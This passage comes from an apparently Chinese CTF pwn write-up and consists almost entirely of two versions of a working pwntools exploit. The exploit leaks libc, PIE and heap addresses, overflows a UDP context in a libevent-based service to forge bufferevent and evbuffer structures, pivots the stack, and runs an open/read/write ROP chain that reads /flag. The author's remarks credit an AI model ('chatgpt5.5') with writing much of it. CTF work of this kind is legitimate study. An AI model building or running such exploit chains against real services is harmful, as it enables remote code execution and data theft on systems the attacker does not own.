    open_addr = libc_base + libc.sym["open"]
    read_addr = libc_base + libc.sym["read"]
    # 48 89 d4 c3 == mov rsp, rdx ; ret
    mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
    call_sendto = pie_base + CALL_SENDTO_OFF

    # Staged open/read/sendto region (path, sockaddr_in, chain). It is built
    # but NOT appended yet: BSS_PATH_OFF (0x41f0) lies inside the fake
    # evbuffer that starts at 0x41e0, so it cannot be placed there as-is.
    rop_region = b""
    rop_region += FILE_PATH
    rop_region = rop_region.ljust(BSS_SOCKADDR_OFF - BSS_PATH_OFF, b"\x00")
    rop_region += p16(socket.AF_INET)
    rop_region += p16(leaks["udp_peer"][1], endian="big")
    rop_region += socket.inet_aton(leaks["udp_peer"][0])
    rop_region += b"\x00" * 8
    rop_region = rop_region.ljust(BSS_ROP_OFF - BSS_PATH_OFF, b"\x00")
    rop_region += pop("rdi", path_addr)
    rop_region += pop("rsi", 0)
    rop_region += p64(open_addr)
    rop_region += pop("rdi", READ_FD)
    rop_region += pop("rsi", read_buf_addr)
    rop_region += pop("rdx", 0x100)
    rop_region += p64(read_addr)
    rop_region += pop("rdx", sockaddr_addr)
    rop_region += pop("rax", UDP_FD)
    rop_region += pop("rsi", read_buf_addr)
    rop_region += p64(call_sendto)

    payload = b""
    payload += request_blob()  # 8 bytes: "0.0.0.0" + NUL
    payload = payload.ljust(OVERFLOW_TO_TCP_USE_BEV, b"\x00")  # pad to 0x58 (88 bytes)
    payload += p64(1)  # tcp_io_ctx_use_bev = 1
    payload += p64(fake_bev_addr)  # tcp_io_ctx_bev = PIE + 0x40c0
    payload += p64(0)  # tcp fd = 0
    payload += p64(leaks["global_event_base"])  # keep global_event_base unchanged
    payload = payload.ljust(BSS_FAKE_BEV_OFF - UDP_IO_CTX_OFF, b"\x00")  # fill to 0x40c0

    # Fake bufferevent at 0x40c0: only its `output` slot matters, the rest is
    # a cyclic pattern so a crash address can be mapped back to an offset.
    output_addr = fake_bev_addr + FAKE_BEV_OUTPUT_OFF + 8  # == PIE + 0x41e0
    fake_cb = output_addr + FAKE_EVB_CALLBACKS_OFF + 8     # entry follows list head
    pivot_stack = output_addr + 0xB0
    payload += cyclic(FAKE_BEV_OUTPUT_OFF)
    payload += p64(output_addr)  # bufferevent.output

    # Fake evbuffer at 0x41e0. This is enough for
    # evbuffer_add_reference() -> evbuffer_invoke_callbacks_() -> sub_EF40()
    # to call fake_cb->cb_func(output, &info, fake_cb->cbarg).
    payload += p64(0)            # +0x00 first
    payload += p64(0)            # +0x08 last
    payload += p64(output_addr)  # +0x10 last_with_datap = &first
    payload += p64(0)            # +0x18 total_len
    payload += p64(0)            # +0x20 n_add_for_cb
    payload += p64(0)            # +0x28 n_del_for_cb
    payload += p64(0)            # +0x30 lock
    payload += p64(0)            # +0x38 flags: no freeze, no deferred callback
    payload = payload.ljust(
        (output_addr + FAKE_EVB_CALLBACKS_OFF) - udp_ctx_addr, b"\x00"
    )
    payload += p64(fake_cb)      # +0x78 callbacks.lh_first
    payload += p64(0)            # +0x80 cb_entry.next
    payload += p64(0)            # +0x88 cb_entry.prev
    payload += p64(mov_rsp_rdx)  # +0x90 cb_entry.cb_func
    payload += p64(pivot_stack)  # +0x98 cb_entry.cbarg -> rdx
    payload += p64(1)            # +0xa0 EVBUFFER_CB_ENABLED
    payload = payload.ljust(pivot_stack - udp_ctx_addr, b"\x00")
    # Marker return address: landing on 0x4141414141414141 confirms the pivot.
    payload += p64(0x4141414141414141)
    # Debug toggle for the staged region above (see the overlap note there):
    # payload = payload.ljust(BSS_PATH_OFF - UDP_IO_CTX_OFF, b"\x00")
    # payload += rop_region
    return payload


def main():
    """Leak addresses, dump them, then send the overflow and the TCP trigger.

    Both tubes are closed on the way out unless INTERACTIVE is set on the
    command line.
    """
    tcp, udp = open_channels()
    try:
        leaks = leak_all(tcp, udp)
        for name, value in leaks.items():
            if isinstance(value, bytes):
                log.info("%s (%#x bytes)", name, len(value))
                print(hexdump(value))
            elif isinstance(value, tuple):
                log.success("%s = %s:%d", name, *value)
            else:
                log.success("%s = %#x", name, value)

        payload = build_payload(leaks)
        log.info("payload_len = %#x", len(payload))
        # UDP overflow first, then a normal TCP request that uses the
        # overwritten tcp_io_ctx fields.
        udp.send(payload)
        tcp.send(request_blob())
        tcp.interactive()
    finally:
        if not args.INTERACTIVE:
            tcp.close()
            udp.close()


if __name__ == "__main__":
    main()

上述代码由chatgpt5.5修改+人为修改,ai真的是有点东西的,这回能够走到劫持程序控制流了:

3.3.4 最终调试版

在上述代码的基础上,让ai在后续补上orw的rop链,最终完成调用:

#!/usr/bin/env python3
import socket

from pwn import *


# Load the challenge binary and the libc it ships with (both expected in the
# current working directory).
context.binary = ELF("./pwn", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
context.arch = "amd64"
context.os = "linux"
# NOTE: there is deliberately no `context.log_level = args.LOG_LEVEL or "info"`
# here. pwntools consumes the LOG_LEVEL=... magic argument itself and applies
# it to the context instead of exposing it through `args`, so that assignment
# always evaluated to "info" and overrode the user's choice. "info" is
# already the default level.

# Target endpoint and tunables, overridable on the command line as KEY=value.
HOST = args.HOST or "192.168.62.130"
TCP_PORT = int(args.TCP_PORT or 8888)
UDP_PORT = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)
TCP_FD = int(args.TCP_FD or 8)  # presumably the accepted TCP client fd; verify in gdb

# Offsets confirmed during reversing / debugging.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
PIE_LEAK_RET_OFF = 0x1619
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)
CALL_SENDTO_OFF = 0x154A

# Offsets relative to the PIE base of the main binary.
UDP_IO_CTX_OFF = 0x4040
# Distance from udp_io_ctx to the first overwritten tcp_io_ctx field.
OVERFLOW_TO_TCP_USE_BEV = 0x58
BSS_FAKE_BEV_OFF = 0x40C0
BSS_PATH_OFF = 0x41F0
BSS_READ_BUF_OFF = 0x4200
BSS_SOCKADDR_OFF = 0x4300
BSS_ROP_OFF = 0x4320
# Field offsets inside the fake evbuffer / bufferevent.
FAKE_EVB_CALLBACKS_OFF = 0x78
FAKE_BEV_OUTPUT_OFF = 0x118


def request_blob() -> bytes:
    """Return the NUL-terminated IPv4 string used as the request prefix."""
    ipv4_text = b"0.0.0.0\x00"
    return ipv4_text


def choose_heap_candidate(reply: bytes) -> int:
    """Pick the heap pointer out of a leaked reply.

    Decodes the 8-byte slots at offsets 0x28 and 0x30 and returns the largest
    one inside ``[0x100000000000, 0x800000000000)``; if neither qualifies,
    the second slot is returned as-is.
    """
    slots = [u64(reply[off:off + 8]) for off in (0x28, 0x30)]
    plausible = [ptr for ptr in slots if 0x100000000000 <= ptr < 0x800000000000]
    if plausible:
        return max(plausible)
    return slots[-1]


def open_channels():
    """Open the TCP tube, then the UDP tube, and return them as ``(tcp, udp)``."""
    tcp_tube = remote(HOST, TCP_PORT, typ="tcp")
    udp_tube = remote(HOST, UDP_PORT, typ="udp")
    return (tcp_tube, udp_tube)


def leak_all(tcp, udp):
    """Send one benign request on each tube and decode every leaked value.

    Returns a dict (insertion-ordered) with the raw replies, the raw leaked
    pointers, the derived base addresses, and ``udp_peer``, the local
    ``(host, port)`` of the UDP socket as reported by ``getsockname()``.
    """
    probe = request_blob()

    # TCP reply: libevent pointer at +0x18 plus a heap pointer candidate.
    tcp.send(probe)
    tcp_reply = tcp.recvn(0x50)
    libevent_ptr = u64(tcp_reply[0x18:0x20])
    heap_ptr = choose_heap_candidate(tcp_reply)
    libevent_at = libevent_ptr - LIBEVENT_LEAK_OFF

    leaks = {
        "tcp_reply": tcp_reply,
        "leaked_libevent": libevent_ptr,
        "libevent_base": libevent_at,
        "libc_base": libevent_at - LIBC_FROM_LIBEVENT,
        "leaked_heap": heap_ptr,
        "global_event_base": heap_ptr - GLOBAL_EVENT_BASE_DELTA,
    }

    # UDP reply: stack pointer at +0x40, PIE return address at +0x48.
    udp.send(probe)
    udp_reply = udp.recvn(0x50)
    stack_ptr = u64(udp_reply[0x40:0x48])
    pie_ret = u64(udp_reply[0x48:0x50])

    leaks["udp_reply"] = udp_reply
    leaks["leaked_stack"] = stack_ptr
    leaks["leaked_pie_ret"] = pie_ret
    leaks["pie_base"] = pie_ret - PIE_LEAK_RET_OFF
    leaks["udp_peer"] = udp.sock.getsockname()

    return leaks


def pop_chain(rop, libc_base, reg, value):
    """Return packed ROP words that load *value* into register *reg*.

    Scans ``rop.gadgets`` for gadgets made only of ``pop`` instructions that
    start with ``pop <reg>`` and end in ``ret``, and uses the shortest one
    (first found on ties). The result is the rebased gadget address, *value*,
    and one zero word for every additional ``pop`` in the gadget.

    Logs a failure and exits with status 1 when no such gadget exists.
    """
    first_insn = f"pop {reg}"
    best = None
    for candidate in rop.gadgets.values():
        insns = candidate.insns
        if not insns or insns[-1] != "ret" or insns[0] != first_insn:
            continue
        if not all(insn.startswith("pop ") for insn in insns[:-1]):
            continue
        # Strict '<' keeps the earliest of equally short gadgets.
        if best is None or len(insns) < len(best.insns):
            best = candidate

    if best is None:
        log.failure("missing pop %s gadget", reg)
        raise SystemExit(1)

    filler_words = len(best.insns) - 2
    return p64(libc_base + best.address) + p64(value) + p64(0) * filler_words

def build_payload(leaks):
    """Build the overflow payload that main() sends over UDP.

    The payload starts with the normal request blob, overwrites the TCP I/O
    context fields, forges a bufferevent whose output pointer refers to a fake
    evbuffer, and hangs a single callback entry off that evbuffer.  The
    callback is a ``mov rsp, rdx; ret`` gadget whose ``cbarg`` (rdx) points at
    a ROP chain doing open(FILE_PATH) / read(READ_FD) / write(TCP_FD).

    Args:
        leaks: Mapping returned by leak_all(); the keys "pie_base",
            "libc_base", "global_event_base" and "udp_peer" are read.

    Returns:
        The payload as bytes.  Offset 0 of the payload corresponds to the
        address ``pie_base + UDP_IO_CTX_OFF``.

    Raises:
        SystemExit: If a required pop gadget is missing (raised by
            pop_chain) or the ROP chain would overrun the path string.
    """
    pie_base = leaks["pie_base"]
    libc_base = leaks["libc_base"]
    udp_peer = leaks["udp_peer"]

    # All target addresses are converted to payload offsets relative to this.
    payload_base = pie_base + UDP_IO_CTX_OFF

    fake_bev_addr = pie_base + BSS_FAKE_BEV_OFF
    output_addr = pie_base + 0x41E0  # fake evbuffer
    fake_cb = output_addr + 0x80  # single evbuffer_cb_entry
    rop_addr = output_addr + 0xB0  # stack after the pivot

    # 0x41f0/0x4200 overlap the fake evbuffer, so place ROP data later.
    path_addr = pie_base + 0x43C0
    sockaddr_addr = pie_base + 0x43D0
    read_buf = pie_base + 0x43E0

    rop = ROP(libc)
    open_addr = libc_base + libc.sym["open"]
    read_addr = libc_base + libc.sym["read"]
    write_addr = libc_base + libc.sym["write"]
    # Bytes 48 89 d4 c3: mov rsp, rdx; ret
    mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))

    def pad_to(buf, addr):
        """Zero-pad *buf* so that the next byte appended lands at *addr*."""
        return buf.ljust(addr - payload_base, b"\x00")

    rop_chain = b"".join(
        [
            # open(path_addr, 0)
            pop_chain(rop, libc_base, "rdi", path_addr),
            pop_chain(rop, libc_base, "rsi", 0),
            p64(open_addr),
            # read(READ_FD, read_buf, 0x50)
            pop_chain(rop, libc_base, "rdi", READ_FD),
            pop_chain(rop, libc_base, "rsi", read_buf),
            pop_chain(rop, libc_base, "rdx", 0x50),
            p64(read_addr),
            # write(TCP_FD, read_buf, 0x50)
            pop_chain(rop, libc_base, "rdi", TCP_FD),
            pop_chain(rop, libc_base, "rsi", read_buf),
            pop_chain(rop, libc_base, "rdx", 0x50),
            p64(write_addr),
        ]
    )

    # Request blob followed by the overwritten TCP I/O context fields.
    payload = request_blob()
    payload = payload.ljust(OVERFLOW_TO_TCP_USE_BEV, b"\x00")
    payload += p64(1)  # tcp_io_ctx_use_bev = 1
    payload += p64(fake_bev_addr)  # tcp_io_ctx_bev = fake_bev_addr
    payload += p64(0)  # tcp fd = 0
    payload += p64(leaks["global_event_base"])  # global_event_base

    # Fake bufferevent: filler up to the output pointer, then the pointer.
    payload = pad_to(payload, fake_bev_addr)
    payload += cyclic(FAKE_BEV_OUTPUT_OFF)
    payload += p64(output_addr)  # bev->output

    # Fake evbuffer at output_addr.  This is enough for
    # evbuffer_add_reference() -> evbuffer_invoke_callbacks_() -> sub_EF40()
    # to call fake_cb->cb_func(output, &info, fake_cb->cbarg).
    payload += p64(0)  # +0x00 first
    payload += p64(0)  # +0x08 last
    payload += p64(output_addr)  # +0x10 last_with_datap = &first
    payload += p64(0)  # +0x18 total_len
    payload += p64(0)  # +0x20 n_add_for_cb
    payload += p64(0)  # +0x28 n_del_for_cb
    payload += p64(0)  # +0x30 lock
    payload += p64(0)  # +0x38 flags: no freeze, no deferred callback
    payload = pad_to(payload, output_addr + FAKE_EVB_CALLBACKS_OFF)
    payload += p64(fake_cb)  # +0x78 callbacks.lh_first
    payload += p64(0)  # +0x80 cb_entry.next
    payload += p64(0)  # +0x88 cb_entry.prev
    payload += p64(mov_rsp_rdx)  # +0x90 cb_entry.cb_func
    payload += p64(rop_addr)  # +0x98 cb_entry.cbarg -> rdx
    payload += p64(1)  # +0xa0 EVBUFFER_CB_ENABLED

    payload = pad_to(payload, rop_addr)
    payload += rop_chain
    # ljust() silently does nothing when the buffer is already too long, which
    # would leave the path string somewhere other than path_addr.
    if len(payload) > path_addr - payload_base:
        log.failure("ROP chain (%#x bytes) overruns the path string", len(rop_chain))
        raise SystemExit(1)

    payload = pad_to(payload, path_addr)
    payload += FILE_PATH

    # sockaddr_in built from the UDP tube's local address.
    # NOTE(review): the chain above replies with write(TCP_FD, ...) and never
    # references this structure; it is kept so the payload bytes are unchanged.
    payload = pad_to(payload, sockaddr_addr)
    payload += p16(socket.AF_INET)
    payload += p16(udp_peer[1], endian="big")
    payload += socket.inet_aton(udp_peer[0])
    payload += b"\x00" * 8
    return payload


def main():
    """Run the exploit end to end.

    Opens both tubes, collects and logs the leaks, sends the payload over UDP,
    sends the request blob bytes over TCP and hands the TCP tube to
    interactive mode.  Both tubes are closed afterwards unless
    ``args.INTERACTIVE`` is set.
    """
    tcp, udp = open_channels()
    try:
        leaks = leak_all(tcp, udp)

        # Raw replies are hex-dumped, the socket name is shown as host:port,
        # everything else is printed as a hex integer.
        for label, item in leaks.items():
            if isinstance(item, bytes):
                log.info("%s (%#x bytes)", label, len(item))
                print(hexdump(item))
                continue
            if isinstance(item, tuple):
                log.success("%s = %s:%d", label, *item)
                continue
            log.success("%s = %#x", label, item)

        exploit = build_payload(leaks)
        log.info("payload_len = %#x", len(exploit))
        udp.send(exploit)
        # Follow-up TCP request after the UDP payload has been sent.
        tcp.send(b"0.0.0.0\x00")
        tcp.interactive()
    finally:
        if not args.INTERACTIVE:
            for tube in (tcp, udp):
                tube.close()
        


# Run the exploit only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()

全靠AI。